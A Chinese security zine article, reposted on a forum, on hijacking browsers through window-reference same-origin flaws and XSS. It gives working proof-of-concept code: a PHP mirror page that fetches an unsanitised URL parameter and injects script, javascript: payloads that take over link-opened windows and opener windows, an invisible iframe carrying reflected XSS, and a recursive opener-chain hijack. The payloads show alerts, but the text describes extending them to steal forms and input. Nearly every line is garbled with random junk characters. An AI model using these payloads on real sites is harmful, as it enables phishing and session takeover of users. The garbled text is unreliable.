==Ph4nt0m Security Team==( ~3 T: C0 h" C% d8 p
2 v1 z7 Y' f; P% N Issue 0x03, Phile #0x05 of 0x07
" D( k! }: f; Z' S1 C* V ; g% W1 g3 |/ }- F( v
6 G. b; X3 U* E# j1 i& E% Y9 l3 k|=---------------------------------------------------------------------------=|
& H. w" Y9 _) r8 e|=---------------=[ 利用窗口引用漏洞和XSS漏洞实现浏览器劫持 ]=---------------=|
3 O; y5 T4 E3 U8 G* v2 q|=---------------------------------------------------------------------------=|8 I# N( _3 w: D3 n
|=---------------------------------------------------------------------------=|
2 |1 P) i4 b& B) L9 U# u" b9 M( x|=------------------------=[ By rayh4c ]=---------------------------=|
+ E4 b" l9 f1 `) i* F3 N; ^|=----------------------=[ <rayh4c#80sec.com> ]=------------------------=|
. E! H, f1 K* J; J) W3 m: R: N|=---------------------------------------------------------------------------=|
& e1 |% H: k& E% q7 P6 `
# B# |0 d C/ {" u0 M2 B$ I; p/ L R; q7 x
[目录]
& w4 O: z7 a9 H9 e+ e; C
X# a$ x% ~& L. J1. 前言
5 g) t& W3 S( K D2. 同源策略简叙
, [) ~( o/ {# p3. 理解window对象的同源策略: t+ z) r" h6 ]6 G
4. 窗口引用功能中的同源策略漏洞! l: O6 O0 w8 v+ f- ?8 }
4.1 父窗口引用子窗口的同源策略问题
0 x0 \7 m2 O: B 4.2 子窗口引用父窗口的同源策略问题) a) w9 ^3 B* F. V I2 p& g& d
5. 利用窗口引用漏洞劫持浏览器
( D7 R0 t8 j3 ?! P5 W7 Y! s/ e, V8 t6. 利用XSS漏洞劫持浏览器
) Q# t q. s' @; T 6.1 正向跨窗口劫持, G1 S" V4 J) ?* g9 v/ ~: E
6.2 反向跨窗口劫持3 Q1 S! f: \% h" P
6.3 极度危险的跨框架窗口引用劫持
- c n( a& ` P" A# f9 ^# k3 G 6.4 极度危险的正反向跨窗口递归劫持- O6 h( k- ]5 Z, D1 _% I, l- t
6.5 完全控制浏览器 W7 v7 Z) e( M2 Q
7. 后记9 ^0 \) x. K) y5 A7 w6 {: J
8. 参考: X, n' j, t9 M3 W8 T$ R1 y
: O. E% S% k) G5 Y2 s" M3 Q
# y7 x* O& d5 L! A& p3 T一、前言
# K4 i% G: P6 u6 d# l4 P8 y. x! R6 j5 A
最近国内关于XSS漏洞的技术文档都比较少,所以决定写这篇文档,其中的很多细节和朋
: M4 o _$ Z2 Q8 p1 _友们都沟通讨论很久了,其中包括了我对浏览器同源策略和XSS的一些理解。XSS漏洞从Session$ A/ p% t6 g" J0 u5 L8 ~' m
劫持、钓鱼、XSS WORM等主流攻击方式发展到现在,告诉了大家一个真正的跨站师是不会被
6 E; [% t5 ]6 q- t条条框框所束缚,跨站师们在不断的创新,跨站师们会展示XSS漏洞的所有可能。' B9 o* v; @' F# b
9 v ]( k# T# X1 w% _
9 L" A8 X7 u% ?: d7 T
二、同源策略简叙4 A- D8 O1 u0 }/ Z3 E( u
; c$ d1 \1 ^8 B; w6 X* C 同源策略是浏览器的安全基础,它是浏览器支持的客户端脚本的重要安全标准,我们可以
9 p1 n1 k x ~, R" o& y从“源”上了解这一安全标准,按照W3C的标准这个“源”包括域名、协议和端口,各大浏览器都" g" M, |4 _- m; v9 V
曾爆出过很多同源策略漏洞,危害程度各有不同,比如从06年开始流行至今的MS06-014网页木
# j' v+ @: H$ O% e' g" \/ U6 ^4 S' F7 E马漏洞都已经完全颠覆了同源策略。这次的文档主要说的是DOM的同源策略(参考2)中的一个( @2 d. }' w5 B- P
漏洞,然后从漏洞引申到XSS漏洞如何利用DOM的同源策略特性,最终实现浏览器劫持。# P/ X% d# b* [2 E+ ~9 l0 F# A- W
7 w" y r2 H" O. O; D+ f
( q8 U2 i" n# A; c三、理解window对象的同源策略7 K& P9 U; {1 t# M2 C
/ P6 m0 z$ b8 [; V i L
窗口即指的是浏览器窗口,每个浏览器窗口都可以使用window对象实例来表示,window对
; Y: R: N- u! V! ?5 r4 ^象有很多属性和方法,写一个简单的脚本可以历遍出window对象的所有属性和方法:
0 C% E% I( U; W) H5 @: b2 i: K: [- P; S) r$ I. o+ E
--code-------------------------------------------------------------------------+ Y# D, U, R& q( B. q
<script language="javascript">- X7 v: ]% }7 E; E, q
for(p in window) document.write(p+"<br>");
2 ]7 H7 w1 G" w/ U* ]3 _8 ]8 ^2 Z</script>) F# p! @8 G8 W2 P5 L+ G
-------------------------------------------------------------------------------7 }( Z6 H/ X! e# u
* ]$ A3 q6 w5 ]
这些window对象的属性和方法可以改变窗口的外观和窗口网页的内容,当这些属性和方: j. f+ z6 Y; D, Y
法只在一个窗口中使用并不会凸显出安全问题,但是当多个window对象开始互相引用的时候,
" g( k# m1 F0 B1 ]' l* ~, Q- h这些属性和方法就必须遵循同源策略。8 D3 z' Y% @+ B. X
; {# y4 L3 E) k7 H 举一个简单的例子,如果在a.com的网页可以调用b.com网页window对象的属性和方法,那
) ?; D/ e# N) ~! Y么跨站师就可以随便XSS互联网上任何一个网站了,所以为了避免安全问题,同源策略是必须- F8 w7 r+ }4 R. x8 @
的。我们可以把下面的脚本保存为demo.html到本地打开或者丢到远程服务器上进行测试,这
. m$ Q; h" C F: s+ F+ h个脚本的效果是调用不同源的子窗口window对象的属性和方法,我们会发现location属性的! [' q: m, s( ?! `9 H+ c) F& K% s
值类型是空白的,这种情况太特殊了,说明不同源的父窗口引用子窗口window对象的location
% H7 D6 Y2 Q/ s8 V `属性并没有被拒绝访问。9 n) z3 Y8 M% Z6 u# S2 |3 S
+ S" \, H1 ]. e: w+ `4 D4 Y2 ?--demo.html--------------------------------------------------------------------9 b; I. r2 t2 n
<script language="javascript"> 1 q% f& ?6 `" L2 F9 o9 [3 A
function allPrpos(obj) {
3 }9 x. \% k2 C/ B- C- N# J# [ var props = "<table><tr><td>名称</td><td>值</td>"; * N+ r1 r. x& R1 L( J7 m
for(var p in obj){ 9 p& b7 j }$ V$ e
if(typeof(obj[p])=="function"){ . n8 W7 }2 }& E" z" d d5 G" V2 P
obj[p]();
* e7 `" l$ Z5 {( s+ Z. ^4 B( b# x }else{ 5 w) L- P5 O2 P3 I( e4 u
try
9 q f# {3 v# O$ c9 \/ t# h { : b/ b/ x8 Q q
props+="<tr><td>"+p + "</td><td>" + obj[ p ] + "</td></tr>";
# l( i c* T& @ }
6 ^2 S3 p* j8 W2 r0 h catch (ex)
7 r9 [9 A1 N7 y" G5 s' n( H {
: W+ \5 A, F3 s$ V! o- c w
3 y' l2 U1 V9 w4 s. r% | props+= "<tr><td>"+p + "</td><td>" +ex.message+"</td></tr>"; ( o9 B2 U0 B8 w3 p! K
}
$ Z( D I# f% W; g1 ^6 x8 S( Q' w S# p
3 G0 \, t1 E9 H } # \& }# l9 R3 p# b9 ?
}
- c3 h1 V+ L8 V) R& O/ k
k( r' [# c5 a- [ document.write(props+"</table>"); . ?' A- N5 ?1 G8 c2 s2 K7 ]
} p0 [2 T% F! x& t/ `. U J
4 O3 p, P% t; j. \function createWin() {
- V5 X1 k) p8 b* N8 B2 c newWin = window.open ("http://www.google.com");
2 q+ v' e4 V% Q1 J7 A( p setTimeout(function(){allPrpos(newWin)},2000);
' }2 ]4 T$ h5 x0 V} # q' r5 E! p$ m$ [5 \+ d
+ v8 J( A5 @, i
</script>
6 D. I& L9 {; @" ~ ?+ B/ G2 N! L2 Z3 ?3 y! f
<button onclick='createWin()'>创建一个非同源子窗口测试</button>. ]- m" x& x, Q/ E7 \- V" n
-------------------------------------------------------------------------------$ o" F6 P7 b& q1 W
6 l' S2 m# ^. @$ ?3 {: Z3 i
2 E: S# p8 z- J1 I四、窗口引用功能中的同源策略漏洞
! t% B: G8 o7 V7 @6 x+ S2 _
% i4 g- s7 N) z7 l* \/ \4.1 父窗口引用子窗口的同源策略问题- m+ ?0 ^1 h6 B' R
, V8 \# ^: o& y" u& }* _" D( X+ x' D" X
去年我在幻影杂志发过的IE6跨域脚本漏洞,这个问题微软已经发布了ms08-058补丁修复," v8 w5 _8 B& W
但这个漏洞仍然暴露了父窗口引用子窗口的同源策略问题。根据第二部分的测试,我们知道
- H: ?3 K. [0 _7 x$ f浏览器并没有阻止父窗口访问非同源子窗口的location属性值,我们可以使用下面的脚本进' P9 C. G4 U t; b
行测试,会发现父窗口可以控制非同源子窗口location属性值。
* {5 M7 y# J& V3 w3 z$ U0 {
2 k6 D1 A, v$ ~) O--vul1.html--------------------------------------------------------------------. A+ S3 U, ?+ J7 [# v) q6 s
<script language="javascript"> 6 Q4 F7 y+ K( T" e0 _" ]% H
function createWin() {
' ^0 H/ X# b3 {: I newWin = window.open ("http://www.google.com");
8 e3 U& r8 J+ ^% w! r8 }0 c' J setTimeout(function(){newWin.location="http://www.80sec.com"},2000);
, g3 ^& W% u, l: h. P7 V2 a} H5 K! |' j( O# b2 [6 J+ \
</script>
: r1 J5 B- l' z2 Y2 U8 `5 C4 T( \& j) p
<button onclick='createWin()'>创建一个非同源子窗口测试</button>
) R9 Z7 L" [$ y7 @4 l% r r-------------------------------------------------------------------------------
( A5 a0 k$ \* r. P" A/ n
% g! ] X' O6 ~0 u" h* }
3 `* Y; t' ?6 h, Z& i. D4.2 子窗口引用父窗口的同源策略问题
1 S+ ?4 _! W; \4 c4 i6 A2 z6 g; D, ^- V
逆向测试一次会发现子窗口引用父窗口也存在同样的问题,这里为了更方便和直观我使5 y4 L* F6 X6 t3 X1 o
用javascript伪协议进行验证。子窗口引用父窗口的window对象属性是window.opener,我们7 p o( t( t; ?$ { h% e" f
可以随意浏览一个网站点击链接打开N个网页,在这些网页的地址栏注入下面的脚本,你一定8 \, J. F$ |+ o$ D1 p
会惊奇的发现,不管同源还是非同源的父窗口都转跳到了80SEC网站。
# a1 h+ j- d4 Y" X8 g
/ g5 i, ]) J H# }7 d& w. {7 U--code-------------------------------------------------------------------------) N1 n4 w& X% z7 k3 i# ]1 G; ^
) g/ z. f ~6 [' b& Rjavascript:window.opener.location = "http://www.80sec.com";void(0);3 W" {) M: B) W/ Z8 @2 F9 J
" ^3 l9 o1 H8 ]" k8 V
-------------------------------------------------------------------------------
3 w/ {6 B! I* {
1 \% j8 D4 E( T: e$ b, J: G
' [! D) W$ q; t0 [6 u五、利用窗口引用漏洞劫持浏览器
& O! h! t; H6 F, l$ _" a9 [9 p
7 l/ L/ ?) t# x! o 经过上面三个枯燥的测试,我们已经暴露了浏览器一个非常严重的安全问题,非同源的子8 w; d, { n" h
窗口和父窗口可以互相引用控制window对象的location属性值,并没有严格遵循同源策略,那& Q3 X% o9 l& m I* k: r, m4 b! p4 G
么用户在浏览器中的所有点击行为都有可能被跨站师变相控制。
* z, b$ k9 I7 ?
9 C& X7 J" W c% u# [ 我们打开浏览器访问互联网上的各个网站,无时无刻不在点击链接,我们点击链接想要产: B; G; P3 J0 X2 d4 ~
生的结果是去访问我们想要去的URL地址,用户的正常点击只会产生两个结果,打开新窗口或
* D4 `( h# k$ b. S者当前窗口转跳,试想一下你在SNS网站、电子商务网站、BLOG、论坛里点击一个正常的链接) W$ F4 s0 @0 ?7 E
后,打开了一个“无害”的网页,原本浏览的信任网页却已经被悄悄替换了,大家可以联想一下
: O0 Q7 Z/ [% _8 ^6 a. L' U会产生什么可怕的后果。
5 {! C6 F+ E: e) Z$ O( S
+ P7 F# F7 ]# D& z 下面我写了一个劫持浏览器的小Demo,思路是获取REFERER后生成镜像页面,同时加入我9 o# d2 G; X" s$ ^( S: i
们的劫持脚本。比如把这个hjk_ref.php丢到本地服务器上测试,将http://127.0.0.1/hjk_ref.php) E6 e# |/ b/ H9 b7 W
这样的链接发到任意一个网站上,点击链接打开新窗口,当所有的注意力都停滞在新窗口的时
2 K3 I( s$ `- s; N! `候,3秒后一个镜像页面将会悄悄替换链接所在页。按照类似的思路,发挥跨站师的想象力,可
" {4 A/ H. y, M/ T: f以做更多的事情,所有的一切仅仅是因为点击了一个链接。7 a+ a5 }+ M& I2 f* b
+ k' j4 B' X1 U' C, P: y
--hjk_ref.php------------------------------------------------------------------
2 Q% r9 {/ t$ W7 }<?php X/ j, F' F7 k4 ~
if (array_key_exists("HTTP_REFERER", $_SERVER)) {
0 ?1 U+ ~5 U# U6 J- ^& {$Url_Mirror = $_SERVER["HTTP_REFERER"];* r# `/ p( m+ K) G) w
}
5 g9 |, J9 r$ q# X6 wif(isset ($_GET['ref'])) {2 H. ~" a. Y; Y M* e" R6 [
echo file_get_contents($_GET['ref']) . '<script>alert(\'I had been hijacking your browser!\')</script>';9 k/ h' r n9 k% A9 {- l+ ?
}
- E. C" R$ K2 h d?>
" Q! ~- W; m) W+ z6 u" g" t$ r! l" A6 a# K! N
<script language="javascript">
3 h B/ R$ K0 t% U( T, T& X- B* EsetTimeout(function(){window.opener.location=window.location+"?ref=<?echo $Url_Mirror;?>"},3000); 4 I/ ^: W/ N/ {6 X& F
</script>8 w) o' N' e$ T# a9 U8 H# q4 x
-------------------------------------------------------------------------------$ g% U& b( D+ R8 N
$ [; B1 u% _/ c0 ~% P& U1 @
注:各大主流浏览器仅opera和internet explorer 8不存在窗口引用漏洞。+ \& L- R6 I. q; Z$ L6 g
* `: Y/ y$ y$ I3 j( i
1 B; G- M( U7 l
六、利用XSS漏洞劫持浏览器$ J, u, `* l1 g! f
# Z& x& o6 D' S+ W6 a6 A
延续第四部分的思路,这部分将进入本文的一个重要环节.跨站师们都知道XSS漏洞分为
: l& R' }3 p0 K+ f( R& a7 m持久和非持久两种,这两种类型的漏洞无论怎么利用都无法跳出窗口的生命周期,窗口关闭后
) x$ ]. e+ B9 U( w0 O) l# c# \2 sXSS漏洞的效果也就完全消失,窗口的限制一直束缚着跨站师们的发挥,我这里将和大家一起
3 G# G" a5 q8 Y' P1 u# {7 Q讨论跨站师的终极技巧:
8 [4 z( N G* I9 f8 s( N( G" X8 B7 r/ a/ l3 t
' ~' b' i# Y7 K+ A- C2 C9 ? S
6.1 正向跨窗口劫持
" h) Q. c' I/ }' ?6 y: m
: ]; O7 _+ j e4 X7 [0 K2 n3 v* | 大家可以先试验下hijack_open.js这个脚本,比如打开http://bbs.dvbbs.net/动网论坛
* N5 `" ?. y4 J主页,我们在地址栏里复制下面的代码使用伪协议注入hijack_open脚本,然后整个页面的链
6 C) f4 L, l. W. z接就都被劫持住了,点击论坛里的任意一个链接,打开的新窗口都会被注入了一个alert对话7 R$ A9 v& [* x/ q, ]. T8 I, s
框脚本。
2 n2 V% p" \4 j( P) I& T3 \0 ~* q: H4 r3 O+ ^- W8 W, e) x J f7 ]- @
--hijack_open.js---------------------------------------------------------------
/ {) d! ?; T" I' ^1 P+ s! J& H- U7 s6 K- \0 f5 }( e5 g: _/ S7 i% c; P
javascript:for(i=0;i<document.links.length;i++){document.links.onclick=function(){x=window.open(this.href);setTimeout(function(){try{x.location="javascript:alert('I had been hijacking your browser!')"}catch(e){};return false;},3000);return false;}};void(0);
7 E- P M; U' _, E" L+ O" v7 q7 `# Y: q B; |
-------------------------------------------------------------------------------
7 N" N- u8 b `0 C4 S5 N1 t4 ]) }) S: `7 `0 u5 d
6 Q: n: a; w0 |3 k+ t6.2 反向跨窗口劫持; L7 ~7 b0 D, g1 K' t( w2 @' b
# ^5 a6 T0 _5 }) w
同样我们也可以在动网论坛试验,新打开任意一个版块的窗口,在地址栏里复制下面的代2 \: J Y$ ]+ Z% _
码使用伪协议注入hijack_opener脚本,我们会发现原来的页面被反向注入了一个alert对话
0 V0 q8 s, t9 c, W1 F: I$ \框脚本。
! E& j4 y- A0 W1 t; S
: T; Q& W' N, @# O! F, s--hijack_opener.js-------------------------------------------------------------
M3 D: ~' ~/ T8 R# n
, c p, N) K" Z9 n) T: zjavascript:window.opener.location="javascript:alert('I had been hijacking your browser!')";void(0);
& r; Z& E2 q. e+ ^* l
' T `7 q3 L$ Q3 a7 _-------------------------------------------------------------------------------
' I; Q" l; x( w5 S. \( o3 b9 T. M4 T; _4 |4 a
& j9 f! P5 n0 b$ Q+ r2 j
6.3 极度危险的跨框架窗口引用劫持7 {5 T# g7 q) y# ?8 i7 K6 M
( D; W9 Q" w; o2 h i6 U/ n+ m3 _+ q
非持久型XSS漏洞是在URL参数中注入脚本,一度被认为很鸡肋,一个非持久型的XSS漏洞1 n6 A. ?# i% l0 H
可能出现URL参数过于冗长等缺点,下面这个window.parent.opener的跨框架窗口引用技巧就. v0 x6 @/ _/ G% F }0 d( C
适用于所有的非持久型XSS漏洞,我们可以在一个被攻击者的信任网站上的网页里iframe一个! W c6 r# ]4 K' I3 [* l
非持久型的XSS,如下:2 f4 B6 \6 l1 e! D
c! [) J+ Y$ c<iframe src='http://www.target.com/index.php?vul=xss'width='0' height='0'>" T. z$ V: w' S% Z9 ]
6 [% j& y6 V9 t' w6 m: u 在vul参数中写入下面的hijack_frame_opener脚本,跨站师就可以反向跨框架引用窗口! I5 l# v+ \( R
注入脚本。
' S% ]: h6 ~6 {+ ^' d- V$ A' n7 c c/ p5 j7 X7 p
--hijack_frame_opener.js-------------------------------------------------------
$ s; R- ?4 q0 }& d0 _$ w& ]<script>
* z, x) m: P# Y/ S) x; R; N4 B6 Gwindow.parent.opener.location="javascript:alert('I had been hijacking your browser!')";/ R6 ]; ]6 H. d% @/ f% x
</script>* n, ^$ l+ ]6 ?, m
-------------------------------------------------------------------------------
; n" Q0 i% v0 N [1 P* c" v3 ]" G e
( G3 N. N* g& d( c9 M3 L( d9 [2 [: O+ r! {, d# e& W, ?2 G0 F
6.4 极度危险的正反向跨窗口递归劫持
. M# z- H4 }% S5 b
% \, I- y- @( x$ ?, K luoluo建议我加上了这一部分,窗口之间的引用关系可能是复杂的,我们可以通过window0 {1 i% X% T% K3 }) o
的opener属性链反向递归查找窗口注入XSS脚本,将互相引用过的同域窗口全部劫持,并通过) q5 T& h* j+ \1 j
异常处理规避之间跨域页面的访问异常,代码如下:
( g6 C$ |% ?8 D. F
+ s2 `0 U D0 ~--code-------------------------------------------------------------------------) U$ |, {( K5 D2 W8 i% l# G$ `( w) Q2 Y
3 O; g* v& t# m$ Z) b2 e/ r
javascript function(){var w=window;while(w.opener){w=w.opener;try{w.location="javascript:alert('I had been hijacking your browser!');void(1);";}catch(e){}}})();void(0);
5 |- S$ A# D1 c& d4 ]4 ^" c
7 ?* t# y1 J w1 ?' W-------------------------------------------------------------------------------& B' _7 H6 a/ K, g5 ?1 F" ^7 {
5 Q/ {$ T; ?' r; W: V, [
假设页面打开序列有A域->B域->A域的情况,通过对第二个A域页面的反向递归劫持则可
% ]; \: P/ R5 R/ {, r4 k以劫持B域之前的A域页面,从而实现“隔空打击”。
1 K4 ]2 X# C: T0 y2 {* D% v! w3 F& D8 i {4 V, X9 i6 `7 ~% D
同理,正向跨窗口劫持也可以实现递归劫持所有同域的链接,对每个打开的被劫持的页面! F9 @6 E' E5 k% F6 v. y9 @. @
执行和第一个页面一样的劫持脚本,但是正向递归没法实现反向递归的那种“隔空打击”。
* i6 ^* @6 M3 d; d6 T* F+ D9 R. K
结合正向和反向的链式递归劫持,最终我们可以劫持所有的同域页面。$ i- r/ l% _) v4 X( D% F
3 K0 I0 k* q/ N9 |/ o2 u) d ~9 L
) g6 u# A" @/ |
6.5 完全控制浏览器% J7 {/ s6 X" }* `' V
# }. Y$ R2 t8 p3 d
一个跨站脚本漏洞的真正意义在程序员的角度是输入和输出问题,而在跨站师的角度则
1 M- }6 l( D; W9 K是能够进入同源策略了,可以摆脱同源策略的束缚做任何想做的事情。跨站师们可以利用XSS
5 n5 \6 o3 ^+ R; U5 r0 w' D漏洞在同源策略允许的范围内再跨页面注入脚本,可以不再为窗口关闭后XSS漏洞的效果消失* F9 a; J- j+ G0 [! K Z
而烦恼,劫持窗口后的跨站师们可以任意发挥,劫持表单,劫持请求,劫持输入等等,我就不再0 M7 t( s2 W: G8 ^" s! |$ x
列举实例。无论是持久型还是非持久型的XSS漏洞都是能够发挥最大的威力的,最后实现跨站
8 a* h( s. \- h师的终极目标 - 完全控制浏览器。
/ |/ _; M2 {# B7 v% N& o& X" n7 F
( g; K% T2 U+ `, c: y3 O, a7 ^1 x* F: R% m
七、后记
, S& a. \# A6 d; [& e% E& L, f/ H) Z' t1 M+ _( L7 M
文章涉及的安全技术全部都是纯研究性质,请不要将这些技术使用在非法途径上。安全
' B6 [3 S8 t% u( V/ ^& i1 k* w与应用永远是一个矛盾体,通往安全的路永远不止一条。感谢对这篇文档的思路和技术给予
) g" p6 y* W. i' w过帮助的luoluo、cnqing、linx以及80Sec团队的所有成员。: @) o2 U: w ^$ M+ |8 o& a
0 e9 J0 w0 t* W) n5 b; O0 z7 F
3 I u+ v N% t4 D. m7 c
八、参考
+ u4 x" O$ Z4 [: r- B( y* h( m
! `8 }6 v2 ?" j( ]1. http://en.wikipedia.org/wiki/Same_origin_policy
1 d1 v# N2 M2 W. [2. http://code.google.com/p/browser ... licy_for_DOM_access
- }' S5 [4 V" d/ d3. http://www.w3.org/TR/Window// O) C' T( X$ T9 b {% [* Y+ q
4. http://www.80sec.com/release/browser-hijacking.txt! H9 x; i& J6 w5 d) s9 b& h, a/ s
5. http://www.80sec.com/all-browser-security-alert.html
4 p. o0 r$ i1 x7 K% R4 N$ g, P6. http://www.80sec.com/ms08-058-attacks-google.html
8 V& j' U: s5 y" Y6 L+ t+ I0 C4 E0 Q1 {! ~# m: ^- Y, l2 D
-EOF- |
发表于 2012-9-13 17:10:56
收藏
支持
反对